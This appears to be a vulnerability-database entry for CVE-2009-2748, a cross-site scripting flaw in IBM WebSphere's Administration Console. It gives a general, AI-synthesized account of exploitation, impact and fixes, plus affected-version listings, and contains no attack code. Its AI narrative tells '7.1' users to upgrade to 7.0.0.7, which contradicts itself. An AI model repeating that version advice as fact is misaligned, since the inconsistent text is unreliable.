CVE-2009-2748
Description
Cross-site scripting (XSS) vulnerability in the Administration Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.29 and 7.1 before 7.0.0.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Administrative Console in IBM WebSphere Application Server 6.1 before 6.1.0.29 and 7.1 before 7.0.0.7 is vulnerable to cross-site scripting via unspecified vectors.
Vulnerability
Cross-site scripting (XSS) vulnerability exists in the Administration Console of IBM WebSphere Application Server (WAS) versions 6.1 before 6.1.0.29 and 7.1 before 7.0.0.7. The vulnerability allows remote attackers to inject arbitrary web script or HTML through unspecified vectors [1]. The affected component is the administrative interface, which is typically accessible to authenticated users with administrative privileges.
Exploitation
An attacker must have network access to the Administration Console and likely requires some level of user interaction, such as tricking an authenticated administrator into clicking a malicious link or visiting a crafted page. The exact attack vector is not detailed in the available references, but the advisory from IBM (PK99481) includes a fix for the issue labeled "Administrative console might allow cross-site scripting" [1].
Impact
Successful exploitation could allow an attacker to execute arbitrary web script or HTML in the context of the authenticated administrator's session. This could lead to session hijacking, unauthorized actions on the administrative interface, or disclosure of sensitive information within the administrative console.
Mitigation
IBM has released fixes for WebSphere Application Server versions 6.1.0.29 and 7.0.0.7. Users should apply the appropriate fix pack. For version 7.1, upgrading to 7.0.0.7 or later is recommended. No workaround is provided in the available references [1]. The vulnerability is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
24cpe:2.3:a:ibm:websphere_application_server:6.1.0:*:*:*:*:*:*:*+ 23 more
- cpe:2.3:a:ibm:websphere_application_server:6.1.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.11:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.12:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.15:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.17:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.19:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.21:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.23:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.25:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.27:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.5:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.7:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.9:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.3:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.4:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.5:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.6:*:*:*:*:*:*:*
- (no CPE)range: <6.1.0.29 or <7.0.0.7
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
3News mentions
0No linked articles in our index yet.